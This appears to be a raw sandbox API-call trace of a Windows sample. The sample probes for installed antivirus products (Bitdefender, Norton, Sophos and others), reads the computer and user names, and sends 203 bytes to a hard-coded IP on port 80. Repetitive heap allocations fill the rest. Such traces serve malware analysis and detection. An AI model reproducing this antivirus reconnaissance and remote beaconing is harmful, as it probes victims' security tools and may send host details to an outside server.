RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2165d80 [0117.034] GetFileAttributesA (lpFileName="C:\\ProgramData\\360TotalSecurity" (normalized: "c:\\programdata\\360totalsecurity")) returned 0xffffffff [0117.034] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.034] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2165a20 [0117.034] GetFileAttributesA (lpFileName="C:\\ProgramData\\Bitdefender" (normalized: "c:\\programdata\\bitdefender")) returned 0xffffffff [0117.034] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.034] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2165f30 [0117.034] GetFileAttributesA (lpFileName="C:\\ProgramData\\Norton" (normalized: "c:\\programdata\\norton")) returned 0xffffffff [0117.034] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.034] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2165fc0 [0117.035] GetFileAttributesA (lpFileName="C:\\ProgramData\\Sophos" (normalized: "c:\\programdata\\sophos")) returned 0xffffffff [0117.035] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.035] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2165c60 [0117.035] GetFileAttributesA (lpFileName="C:\\ProgramData\\Comodo" (normalized: "c:\\programdata\\comodo")) returned 0xffffffff [0117.035] GetComputerNameA (in: lpBuffer=0x41b510, nSize=0x19db1c | out: lpBuffer="NQDPDE", nSize=0x19db1c) returned 1 [0117.035] GetUserNameA (in: lpBuffer=0x413510, pcbBuffer=0x19db1c | out: lpBuffer="FD1HVy", pcbBuffer=0x19db1c) returned 1 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x21615c0 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x21604a0 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x21604c8 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x21604f0 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x2160518 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x2160540 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x2160568 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x2166408 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x2166430 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x2166818 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x2166548 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x21667a0 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x2166598 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x21664f8 [0117.040] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x10) returned 0x2160590 [0117.040] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0117.045] socket (af=2, type=1, protocol=6) returned 0x200 [0117.344] htons (hostshort=0x50) returned 0x5000 [0117.344] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0117.344] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0122.632] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0122.632] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0122.632] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0122.632] connect (s=0x200, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0122.889] send (s=0x200, buf=0x19d8f8*, len=203, flags=0) returned 203 [0122.890] recv (in: s=0x200, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0123.158] closesocket (s=0x200) returned 0 [0123.158] WSACleanup () returned 0 [0123.158] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2166860 [0123.158] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2166a88 [0123.158] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2166cb0 [0123.158] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2166ed8 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2167100 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2167328 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2167550 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2167778 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21679a0 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2167bc8 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2167df0 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2168018 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2168240 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2168468 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2168690 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21688a8 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2168ac0 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2168cd8 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2168ef0 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2169108 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2169320 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2169538 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2169750 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2169968 [0123.159] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2169b80 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2169d98 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2169fb0 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x216a1c8 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x216a3e0 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x216a5f8 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216a810 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216aa18 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216ac20 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216ae28 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216b030 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216b238 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216b440 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216b648 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216b850 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216ba58 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216bc60 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216be68 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216c070 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216c278 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216c480 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x216c688 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216c890 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216ca88 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216cc80 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216ce78 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216d070 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216d268 [0123.160] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216d460 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216d658 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216d850 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216da48 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216dc40 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216de38 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216e030 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216e228 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216e420 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x216e618 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x216e810 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x216e9f8 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x216ebe0 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x216edc8 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc0048 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc0230 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc0418 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc0600 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc07e8 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc09d0 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc0bb8 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc0da0 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc0f88 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc1170 [0123.161] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc1358 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x1fc1540 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc1728 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc1900 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc1ad8 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc1cb0 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc1e88 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc2060 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc2238 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc2410 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc25e8 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc27c0 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc2998 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc2b70 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc2d48 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc2f20 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc30f8 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x1fc32d0 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc34a8 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc3670 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc3838 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc3a00 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc3bc8 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc3d90 [0123.162] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc3f58 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc4120 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc42e8 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc44b0 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc4678 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc4840 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc4a08 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc4bd0 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc4d98 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x1fc4f60 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc5128 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc52e0 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc5498 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc5650 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc5808 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc59c0 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc5b78 [0123.163] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc5d30 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc5ee8 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc60a0 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc6258 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc6410 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc65c8 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc6780 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc6938 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x1fc6af0 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc6ca8 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc6e50 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc6ff8 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc71a0 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc7348 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc74f0 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc7698 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc7840 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc79e8 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc7b90 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc7d38 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc7ee0 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc8088 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc8230 [0123.164] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc83d8 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x1fc8580 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc8728 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc88c0 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc8a58 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc8bf0 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc8d88 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc8f20 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc90b8 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc9250 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc93e8 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc9580 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc9718 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc98b0 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc9a48 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc9be0 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc9d78 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x1fc9f10 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fca0a8 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fca230 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fca3b8 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fca540 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fca6c8 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fca850 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fca9d8 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fcab60 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fcace8 [0123.165] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fcae70 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fcaff8 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fcb180 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fcb308 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fcb490 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fcb618 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x1fcb7a0 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcb928 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcbaa0 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcbc18 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcbd90 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcbf08 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcc080 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcc1f8 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcc370 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcc4e8 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcc660 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcc7d8 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fcc950 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fccac8 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fccc40 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fccdb8 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x1fccf30 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fcd0a8 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fcd210 [0123.166] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fcd378 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fcd4e0 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fcd648 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fcd7b0 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fcd918 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fcda80 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fcdbe8 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fcdd50 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fcdeb8 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fce020 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fce188 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fce2f0 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fce458 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x1fce5c0 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fce728 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fce880 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fce9d8 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fceb30 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcec88 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcede0 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcef38 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcf090 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcf1e8 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcf340 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcf498 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcf5f0 